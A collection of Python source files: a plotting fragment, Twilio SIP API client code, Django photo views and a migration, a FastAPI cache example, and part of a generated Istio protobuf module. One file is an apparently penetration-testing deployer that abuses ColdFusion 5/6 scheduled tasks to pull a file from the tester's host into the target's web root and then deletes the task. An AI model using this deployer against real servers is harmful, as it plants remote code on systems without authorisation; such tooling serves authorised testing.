d = np.linspace(0, 6, num=200)
energies = energy_plot(d, potential) - np.log(d)
plt.plot(d, energies - energies.min(), linewidth=2, )
plt.ylim(0, 6)
plt.plot((bins[1:] + bins[:-1]) / 2, values - values.min())
plot_idx += 1
# ax.set_zlim(0,3)
fig_filename = os.path.join(file, filename, "Distances" + "{:04d}.jpg".format(epoch))
utils.makedirs(os.path.dirname(fig_filename))
plt.savefig(fig_filename, bbox_inches='tight')
|
py | 7dfaf086c106661fe4a1e1e011a69e14ccfdb21a | # coding=utf-8
"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.exceptions import TwilioException
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class CredentialListMappingList(ListResource):
def __init__(self, version, account_sid, domain_sid):
"""
Initialize the CredentialListMappingList
:param Version version: Version that contains the resource
:param account_sid: The account_sid
:param domain_sid: A string that uniquely identifies the SIP Domain
:returns: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingList
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingList
"""
super(CredentialListMappingList, self).__init__(version)
# Path Solution
self._solution = {
'account_sid': account_sid,
'domain_sid': domain_sid,
}
self._uri = '/Accounts/{account_sid}/SIP/Domains/{domain_sid}/CredentialListMappings.json'.format(**self._solution)
def create(self, credential_list_sid):
"""
Create a new CredentialListMappingInstance
:param unicode credential_list_sid: The credential_list_sid
:returns: Newly created CredentialListMappingInstance
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingInstance
"""
data = values.of({
'CredentialListSid': credential_list_sid,
})
payload = self._version.create(
'POST',
self._uri,
data=data,
)
return CredentialListMappingInstance(
self._version,
payload,
account_sid=self._solution['account_sid'],
domain_sid=self._solution['domain_sid'],
)
def stream(self, limit=None, page_size=None):
"""
Streams CredentialListMappingInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(
page_size=limits['page_size'],
)
return self._version.stream(page, limits['limit'], limits['page_limit'])
def list(self, limit=None, page_size=None):
"""
Lists CredentialListMappingInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingInstance]
"""
return list(self.stream(
limit=limit,
page_size=page_size,
))
def page(self, page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of CredentialListMappingInstance records from the API.
Request is executed immediately
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of CredentialListMappingInstance
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingPage
"""
params = values.of({
'PageToken': page_token,
'Page': page_number,
'PageSize': page_size,
})
response = self._version.page(
'GET',
self._uri,
params=params,
)
return CredentialListMappingPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of CredentialListMappingInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of CredentialListMappingInstance
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingPage
"""
resource_url = self._version.absolute_url(self._uri)
if not target_url.startswith(resource_url):
raise TwilioException('Invalid target_url for CredentialListMappingInstance resource.')
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return CredentialListMappingPage(self._version, response, self._solution)
def get(self, sid):
"""
Constructs a CredentialListMappingContext
:param sid: The sid
:returns: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingContext
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingContext
"""
return CredentialListMappingContext(
self._version,
account_sid=self._solution['account_sid'],
domain_sid=self._solution['domain_sid'],
sid=sid,
)
def __call__(self, sid):
"""
Constructs a CredentialListMappingContext
:param sid: The sid
:returns: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingContext
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingContext
"""
return CredentialListMappingContext(
self._version,
account_sid=self._solution['account_sid'],
domain_sid=self._solution['domain_sid'],
sid=sid,
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.CredentialListMappingList>'
class CredentialListMappingPage(Page):
def __init__(self, version, response, solution):
"""
Initialize the CredentialListMappingPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param account_sid: The account_sid
:param domain_sid: A string that uniquely identifies the SIP Domain
:returns: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingPage
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingPage
"""
super(CredentialListMappingPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of CredentialListMappingInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingInstance
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingInstance
"""
return CredentialListMappingInstance(
self._version,
payload,
account_sid=self._solution['account_sid'],
domain_sid=self._solution['domain_sid'],
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.CredentialListMappingPage>'
class CredentialListMappingContext(InstanceContext):
def __init__(self, version, account_sid, domain_sid, sid):
"""
Initialize the CredentialListMappingContext
:param Version version: Version that contains the resource
:param account_sid: The account_sid
:param domain_sid: The domain_sid
:param sid: The sid
:returns: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingContext
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingContext
"""
super(CredentialListMappingContext, self).__init__(version)
# Path Solution
self._solution = {
'account_sid': account_sid,
'domain_sid': domain_sid,
'sid': sid,
}
self._uri = '/Accounts/{account_sid}/SIP/Domains/{domain_sid}/CredentialListMappings/{sid}.json'.format(**self._solution)
def fetch(self):
"""
Fetch a CredentialListMappingInstance
:returns: Fetched CredentialListMappingInstance
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingInstance
"""
params = values.of({})
payload = self._version.fetch(
'GET',
self._uri,
params=params,
)
return CredentialListMappingInstance(
self._version,
payload,
account_sid=self._solution['account_sid'],
domain_sid=self._solution['domain_sid'],
sid=self._solution['sid'],
)
def delete(self):
"""
Deletes the CredentialListMappingInstance
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._version.delete('delete', self._uri)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Api.V2010.CredentialListMappingContext {}>'.format(context)
class CredentialListMappingInstance(InstanceResource):
def __init__(self, version, payload, account_sid, domain_sid, sid=None):
"""
Initialize the CredentialListMappingInstance
:returns: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingInstance
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingInstance
"""
super(CredentialListMappingInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'account_sid': payload['account_sid'],
'date_created': deserialize.rfc2822_datetime(payload['date_created']),
'date_updated': deserialize.rfc2822_datetime(payload['date_updated']),
'friendly_name': payload['friendly_name'],
'sid': payload['sid'],
'uri': payload['uri'],
'subresource_uris': payload['subresource_uris'],
}
# Context
self._context = None
self._solution = {
'account_sid': account_sid,
'domain_sid': domain_sid,
'sid': sid or self._properties['sid'],
}
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: CredentialListMappingContext for this CredentialListMappingInstance
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingContext
"""
if self._context is None:
self._context = CredentialListMappingContext(
self._version,
account_sid=self._solution['account_sid'],
domain_sid=self._solution['domain_sid'],
sid=self._solution['sid'],
)
return self._context
@property
def account_sid(self):
"""
:returns: The account_sid
:rtype: unicode
"""
return self._properties['account_sid']
@property
def date_created(self):
"""
:returns: The date_created
:rtype: datetime
"""
return self._properties['date_created']
@property
def date_updated(self):
"""
:returns: The date_updated
:rtype: datetime
"""
return self._properties['date_updated']
@property
def friendly_name(self):
"""
:returns: The friendly_name
:rtype: unicode
"""
return self._properties['friendly_name']
@property
def sid(self):
"""
:returns: The sid
:rtype: unicode
"""
return self._properties['sid']
@property
def uri(self):
"""
:returns: The uri
:rtype: unicode
"""
return self._properties['uri']
@property
def subresource_uris(self):
"""
:returns: The subresource_uris
:rtype: unicode
"""
return self._properties['subresource_uris']
def fetch(self):
"""
Fetch a CredentialListMappingInstance
:returns: Fetched CredentialListMappingInstance
:rtype: twilio.rest.api.v2010.account.sip.domain.credential_list_mapping.CredentialListMappingInstance
"""
return self._proxy.fetch()
def delete(self):
"""
Deletes the CredentialListMappingInstance
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._proxy.delete()
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Api.V2010.CredentialListMappingInstance {}>'.format(context)
|
py | 7dfaf2141340cd25cca67b0ac7ad16fe1d25b27f | from src.platform.coldfusion.interfaces import CINTERFACES
from src.platform.coldfusion.authenticate import checkAuth
from src.module.deploy_utils import _serve, waitServe, parse_war_path, killServe
from threading import Thread
from os.path import abspath
from re import findall
from time import sleep
from src.core.log import LOG
import utility
import state
title = CINTERFACES.CFM
versions = ['5.0', '6.0', '6.1']
def deploy(fingerengine, fingerprint):
""" Scheduled Task deployer for older versions; radically different
than newer systems, so it warrants its own deployer.
"""
cfm_path = abspath(fingerengine.options.deploy)
cfm_file = parse_war_path(cfm_path, True)
dip = fingerengine.options.ip
cookie = checkAuth(dip, fingerprint.port, title, fingerprint.version)[0]
if not cookie:
utility.Msg("Could not get auth", LOG.ERROR)
return
utility.Msg("Preparing to deploy {0}...".format(cfm_file))
utility.Msg("Fetching web root...", LOG.DEBUG)
root = fetch_webroot(dip, fingerprint, cookie)
if not root:
utility.Msg("Unable to fetch web root.", LOG.ERROR)
return
# create the scheduled task
utility.Msg("Web root found at %s" % root, LOG.DEBUG)
utility.Msg("Creating scheduled task...")
if not create_task(dip, fingerprint, cfm_file, root, cookie):
return
# invoke the task
utility.Msg("Task %s created, invoking..." % cfm_file)
run_task(dip, fingerprint, cfm_path, cookie)
# cleanup
utility.Msg("Cleaning up...")
if not delete_task(dip, fingerprint, cfm_file, cookie):
utility.Msg("Failed to remove task. May require manual removal.", LOG.ERROR)
def create_task(ip, fingerprint, cfm_file, root, cookie):
""" Generate a new task; all parameters are necessary, unfortunately
"""
base = "http://{0}:{1}".format(ip, fingerprint.port)
uri = '/CFIDE/administrator/scheduler/scheduleedit.cfm'
if fingerprint.version in ['5.0']:
data = {
"taskNameOrig" : "",
"TaskName" : cfm_file,
"StartDate" : "01/01/2020",
"EndDate" : "",
"ScheduleType" : "Once",
"StartTimeOnce" : "13:24:05",
"Interval" : "Daily",
"StartTimeDWM" : "",
"customInterval" : "0",
"CustomStartTime" : "",
"CustomEndTime" : "",
"Operation" : "HTTPRequest",
"Port" : state.external_port,
"ScheduledURL" : "http://{0}/{1}".format(utility.local_address(), cfm_file),
"Username" : "",
"Password" : "",
"RequestTimeout" : "10",
"ProxyServer" : "",
"HttpProxyPort" : "23",
"Publish" : "1",
"filePath" : root,
"File" : cfm_file.replace('cfml', 'cfm'),
"adminsubmit" : "Submit+Changes"
}
else:
data = {
"TaskName" : cfm_file,
"Start_Date" : "Jan 2, 2020",
"End_Date" : "",
"ScheduleType" : "Once",
"StartTimeOnce" : "13:24:50",
"Interval" : "Daily",
"StartTimeDWM" : "",
"customInterval_hour" : "0",
"customInterval_min" : "0",
"customInterval_sec" : "0",
"CustomStartTime" : "",
"CustomEndTime" : "",
"Operation" : "HTTPRequest",
"ScheduledURL" : "http://{0}:{1}/{2}".format(utility.local_address(),
state.external_port, cfm_file),
"Username" : "",
"Password" : "",
"Request_Time_out" : "",
"proxy_server" : "",
"http_proxy_port" : "",
"publish" : "1",
"publish_file" : root + "\\" + cfm_file,
"adminsubmit" : "Submit",
"taskNameOrig" : ""
}
response = utility.requests_post(base+uri, data=data, cookies=cookie)
if response.status_code == 200:
return True
def run_task(ip, fingerprint, cfm_path, cookie):
""" Invoke the task and wait for the server to fetch it
"""
success = False
cfm_file = parse_war_path(cfm_path, True)
# start up our listener
server_thread = Thread(target=_serve, args=(cfm_path,))
server_thread.start()
sleep(2)
base = 'http://{0}:{1}'.format(ip, fingerprint.port)
if fingerprint.version in ['5.0']:
uri = '/CFIDE/administrator/scheduler/runtask.cfm?task=%s' % cfm_file
else:
uri = '/CFIDE/administrator/scheduler/scheduletasks.cfm?runtask=%s'\
% cfm_file
response = utility.requests_get(base + uri, cookies=cookie)
if waitServe(server_thread):
if fingerprint.version in ['5.0']:
out_diag = "{0} deployed to /{0}".format(cfm_file.replace('cfml','cfm'))
else:
out_diag = "{0} deployed to /CFIDE/{0}".format(cfm_file)
utility.Msg(out_diag, LOG.SUCCESS)
success = True
killServe()
return success
def delete_task(ip, fingerprint, cfm_file, cookie):
"""
"""
base = 'http://{0}:{1}'.format(ip, fingerprint.port)
uri = '/CFIDE/administrator/scheduler/deletetask.cfm'
data = {
"deletesubmit" : "Yes",
"task" : cfm_file
}
response = utility.requests_post(base + uri, data=data, cookies=cookie)
if response.status_code == 200:
return True
def fetch_webroot(ip, fingerprint, cookie):
""" Fetch the webroot for the CF server; this is where our
payload is stashed
"""
base = "http://{0}:{1}".format(ip, fingerprint.port)
if fingerprint.version in ['5.0']:
uri = "/CFIDE/administrator/server_settings/mappings.cfm?mapname=/"
else:
uri = '/CFIDE/administrator/settings/mappings.cfm?mapname=/CFIDE'
response = utility.requests_get(base+uri, cookies=cookie)
if response.status_code == 200:
if fingerprint.version in ['5.0']:
data = findall("name=\"DirectoryPath\" value=\"(.*?)\"",
response.content)
if data and len(data) > 0:
data = data[0]
else:
data = findall("<td nowrap><font class=\"label\"> (.*?) ",
response.content)
if data and len(data) > 0:
data = data[1]
if data:
return data |
py | 7dfaf2b05cf42b40523cd1f337b7553389b1aeff | import json
import logging
from io import BytesIO
from django.contrib.auth.decorators import login_required
from django.http.response import HttpResponse
from django.views.decorators.http import (require_GET, require_http_methods,
require_POST)
from PIL import Image, ImageFile
from pm.form.photo import (MultiplePhotosUpdateForm, PhotoCheckForm,
PhotoUpdateForm)
from pm.models.photo import Photo
from pm.view import set_cookie, update_used_space
from pm.view.authentication import is_authorized
from .message import error, success
ImageFile.MAXBLOCK = 2 ** 20
logger = logging.getLogger(__name__)
LONGEST_SIDE_THUMB = 100
LONGEST_SIDE = 1200
def get_size(original):
return len(original)
def calculate_size(longest_side, other_side, limit):
resize_factor = limit / float(longest_side)
return (limit, int(resize_factor * other_side))
def resize(size, limit):
if size[0] >= size[1]:
size = calculate_size(size[0], size[1], limit)
else:
size = calculate_size(size[1], size[0], limit)
return size
def create_thumb(buf):
image = Image.open(buf)
size = image.size
thumb = BytesIO()
thumb_size = resize(size, LONGEST_SIDE_THUMB)
logger.debug("Resizing thumbnail to %s." % str(thumb_size))
image.resize(thumb_size).save(thumb, "JPEG", optimize=True)
thumb.seek(0)
if size[0] > LONGEST_SIDE or size[1] > LONGEST_SIDE:
original_size = resize(size, LONGEST_SIDE)
logger.debug("Resizing photo to %s." % str(original_size))
image = image.resize(original_size)
original = BytesIO()
# TODO This likely breaks the size calculation.
image.save(original, "JPEG", quality=80,
optimize=True, progressive=True)
original.seek(0)
return original.getvalue(), thumb.getvalue()
@login_required
@require_POST
def insert(request):
logger.info("Request files %s; Request post %s" %
(request.FILES, request.POST))
form = PhotoCheckForm(request.POST, request.FILES, auto_id=False)
if form.is_valid():
place = form.cleaned_data["place"]
logger.info("User %d is trying to insert a new Photo into Place %d." % (
request.user.pk, place.pk))
# ===================================================================
# check place
# ===================================================================
if not is_authorized(place, request.user):
logger.warn("User %s not authorized to insert a new Photo in Place %d. Aborting." % (
request.user, place.pk))
return error("This is not your place!")
# ===================================================================
# check & convert image
# ===================================================================
try:
original, thumb = create_thumb(request.FILES["photo"])
except Exception as e:
logger.error("Could not create thumb. Reason: %s", str(e))
return error(str(e))
# ===================================================================
# check upload limit
# ===================================================================
size = get_size(original)
userprofile = request.user.userprofile
if userprofile.used_space + size > userprofile.quota:
return error("No more space left. Delete or resize some older photos.")
photo = Photo(**form.cleaned_data, order=0, size=size)
# Necessary to avoid "multiple values for argument" error
photo.photo = original
photo.thumb = thumb
userprofile.used_space += photo.size
userprofile.save()
photo.save()
logger.info("Photo %d inserted with order %d and size %d." %
(photo.pk, photo.order, photo.size))
response = success(photo)
set_cookie(response, "used_space", userprofile.used_space)
return response
else:
return error(str(form.errors))
@require_GET
def get_photo_or_thumb(request, photo_id):
print("Trying to find %s" % (photo_id, ))
photo = Photo.objects.get(uuid=photo_id)
if 'thumb' in request.path:
image = photo.thumb
elif 'photo' in request.path:
image = photo.photo
else:
raise ValueError("Unrecognized path %s" % (request.path, ))
return HttpResponse(bytes(image), content_type="image/jpeg")
@login_required
@require_POST
def update(request, photo_id):
form = PhotoUpdateForm(request.POST)
if form.is_valid():
photo = None
try:
photo_id = int(photo_id)
# TODO we need to update the used_space cookie
logger.info("User %d is trying to update Photo %d." %
(request.user.pk, photo_id))
photo = Photo.objects.get(pk=photo_id)
if not is_authorized(photo, request.user):
logger.warn("User %s not authorized to update Photo %d. Aborting." % (
request.user, photo_id))
return error("not your photo")
except Photo.DoesNotExist:
logger.warn("Photo %d does not exist. Aborting." % photo_id)
return error("photo does not exist")
form = PhotoUpdateForm(request.POST, instance=photo)
form.save()
logger.info("Photo %d updated." % photo_id)
return success()
else:
return error(str(form.errors))
@login_required
@require_POST
def update_multiple(request):
try:
json_photos = json.loads(request.POST["photos"])
if len(json_photos) == 0:
return error("The array of photo is empty")
# Collected instances first and update them in one go.
# This way it is not possible to leave the Db in an inconsistent state.
photos_dirty = []
# Check all photos_dirty
for json_photo in json_photos:
form = MultiplePhotosUpdateForm(json_photo)
# fields are incomplete or invalid
if not form.is_valid():
return error(str(form.errors))
# Id cannot be retrieved from form.cleaned_data
photo_id = int(form.data["id"])
photo = Photo.objects.get(pk=photo_id)
# photo does not belong to the user
if not is_authorized(photo, request.user):
logger.warn("User %s not authorized to update Photo %d. Aborting." % (
request.user, photo_id))
return error("not your photo")
photos_dirty.append((photo, json_photo))
except Exception as e:
logger.error("Something unexpected happened: %s" % str(e))
return error(str(e))
# Update all photos in one go.
for (photo, json_photo) in photos_dirty:
logger.info("User %d is trying to update Photo %d." %
(request.user.pk, photo.pk))
form = MultiplePhotosUpdateForm(json_photo, instance=photo)
assert form.is_valid() # we checked this before. this must be valid
form.save()
logger.info("Photo %d updated." % photo.pk)
return success()
@login_required
@require_http_methods(["DELETE"])
def delete(request, photo_id):
try:
photo_id = int(photo_id)
logger.info("User %d is trying to delete Photo %d." %
(request.user.pk, photo_id))
photo = Photo.objects.get(pk=photo_id)
if not is_authorized(photo, request.user):
logger.warn("User %s not authorized to delete Photo %d. Aborting." % (
request.user, photo_id))
return error("not your photo")
used_space = update_used_space(request.user, -1 * photo.size)
logger.info("Photo %d deleted." % photo_id)
photo.delete()
response = success()
set_cookie(response, "used_space", used_space)
return response
except (KeyError, Photo.DoesNotExist) as e:
logger.error("Something unexpected happened: %s" % str(e))
return error(str(e))
|
py | 7dfaf2baab3984f276aac10ebd638e26d1a6025a | # Generated by Django 3.1.6 on 2021-05-17 13:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('myapp', '0014_doctordata_username'),
]
operations = [
migrations.AddField(
model_name='patient_appointment',
name='doctorusername',
field=models.CharField(default='', max_length=50),
),
]
|
py | 7dfaf31c0160d5ab2bba4dced6abbb47f30b1421 | import os
from datetime import datetime
import redis
from fastapi import FastAPI, Request, Response
from fastapi.responses import JSONResponse
from authx import HTTPCache, cache, invalidate_cache
REDIS_URL = os.environ.get("REDIS_URL", "redis://localhost:6379/1")
redis_client = redis.Redis.from_url(REDIS_URL)
class User:
id: str = "112358"
user = User()
app = FastAPI(
title="FastAPI Cache Example",
description="This is a FastAPI cache example",
version="0.1.0",
)
HTTPCache.init(redis_url=REDIS_URL, namespace="test_namespace")
@app.get("/b/home")
@cache(key="b.home", ttl_in_seconds=180)
async def home(request: Request, response: Response):
return JSONResponse({"page": "home", "datetime": str(datetime.utcnow())})
@app.get("/b/logged-in")
@cache(key="b.logged_in.{}", obj="user", obj_attr="id")
async def logged_in(request: Request, response: Response, user=user):
return JSONResponse(
{"page": "home", "user": user.id, "datetime": str(datetime.utcnow())}
)
@app.post("/b/logged-in")
@invalidate_cache(
key="b.logged_in.{}", obj="user", obj_attr="id", namespace="test_namespace"
)
async def post_logged_in(request: Request, response: Response, user=user):
return JSONResponse(
{"page": "home", "user": user.id, "datetime": str(datetime.utcnow())}
)
|
py | 7dfaf394aa23390248a8447cb1c901988533d4af | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: mesh/v1alpha1/network.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import field_behavior_pb2 as google_dot_api_dot_field__behavior__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='mesh/v1alpha1/network.proto',
package='istio.mesh.v1alpha1',
syntax='proto3',
serialized_options=_b('Z\032istio.io/api/mesh/v1alpha1'),
serialized_pb=_b('\n\x1bmesh/v1alpha1/network.proto\x12\x13istio.mesh.v1alpha1\x1a\x1fgoogle/api/field_behavior.proto\"\xd7\x02\n\x07Network\x12\x45\n\tendpoints\x18\x02 \x03(\x0b\x32-.istio.mesh.v1alpha1.Network.NetworkEndpointsB\x03\xe0\x41\x02\x12G\n\x08gateways\x18\x03 \x03(\x0b\x32\x30.istio.mesh.v1alpha1.Network.IstioNetworkGatewayB\x03\xe0\x41\x02\x1a\x46\n\x10NetworkEndpoints\x12\x13\n\tfrom_cidr\x18\x01 \x01(\tH\x00\x12\x17\n\rfrom_registry\x18\x02 \x01(\tH\x00\x42\x04\n\x02ne\x1at\n\x13IstioNetworkGateway\x12\x1f\n\x15registry_service_name\x18\x01 \x01(\tH\x00\x12\x11\n\x07\x61\x64\x64ress\x18\x02 \x01(\tH\x00\x12\x11\n\x04port\x18\x03 \x01(\rB\x03\xe0\x41\x02\x12\x10\n\x08locality\x18\x04 \x01(\tB\x04\n\x02gw\"\xa5\x01\n\x0cMeshNetworks\x12\x46\n\x08networks\x18\x01 \x03(\x0b\x32/.istio.mesh.v1alpha1.MeshNetworks.NetworksEntryB\x03\xe0\x41\x02\x1aM\n\rNetworksEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12+\n\x05value\x18\x02 \x01(\x0b\x32\x1c.istio.mesh.v1alpha1.Network:\x02\x38\x01\x42\x1cZ\x1aistio.io/api/mesh/v1alpha1b\x06proto3')
,
dependencies=[google_dot_api_dot_field__behavior__pb2.DESCRIPTOR,])
_NETWORK_NETWORKENDPOINTS = _descriptor.Descriptor(
name='NetworkEndpoints',
full_name='istio.mesh.v1alpha1.Network.NetworkEndpoints',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='from_cidr', full_name='istio.mesh.v1alpha1.Network.NetworkEndpoints.from_cidr', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='from_registry', full_name='istio.mesh.v1alpha1.Network.NetworkEndpoints.from_registry', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='ne', full_name='istio.mesh.v1alpha1.Network.NetworkEndpoints.ne',
index=0, containing_type=None, fields=[]),
],
serialized_start=241,
serialized_end=311,
)
_NETWORK_ISTIONETWORKGATEWAY = _descriptor.Descriptor(
name='IstioNetworkGateway',
full_name='istio.mesh.v1alpha1.Network.IstioNetworkGateway',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='registry_service_name', full_name='istio.mesh.v1alpha1.Network.IstioNetworkGateway.registry_service_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='address', full_name='istio.mesh.v1alpha1.Network.IstioNetworkGateway.address', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='port', full_name='istio.mesh.v1alpha1.Network.IstioNetworkGateway.port', index=2,
number=3, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=_b('\340A\002'), file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='locality', full_name='istio.mesh.v1alpha1.Network.IstioNetworkGateway.locality', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='gw', full_name='istio.mesh.v1alpha1.Network.IstioNetworkGateway.gw',
index=0, containing_type=None, fields=[]),
],
serialized_start=313,
serialized_end=429,
)
_NETWORK = _descriptor.Descriptor(
name='Network',
full_name='istio.mesh.v1alpha1.Network',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='endpoints', full_name='istio.mesh.v1alpha1.Network.endpoints', index=0,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=_b('\340A\002'), file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='gateways', full_name='istio.mesh.v1alpha1.Network.gateways', index=1,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=_b('\340A\002'), file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_NETWORK_NETWORKENDPOINTS, _NETWORK_ISTIONETWORKGATEWAY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=86,
serialized_end=429,
)
_MESHNETWORKS_NETWORKSENTRY = _descriptor.Descriptor(
name='NetworksEntry',
full_name='istio.mesh.v1alpha1.MeshNetworks.NetworksEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='istio.mesh.v1alpha1.MeshNetworks.NetworksEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='istio.mesh.v1alpha1.MeshNetworks.NetworksEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('8\001'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=520,
serialized_end=597,
)
_MESHNETWORKS = _descriptor.Descriptor(
name='MeshNetworks',
full_name='istio.mesh.v1alpha1.MeshNetworks',
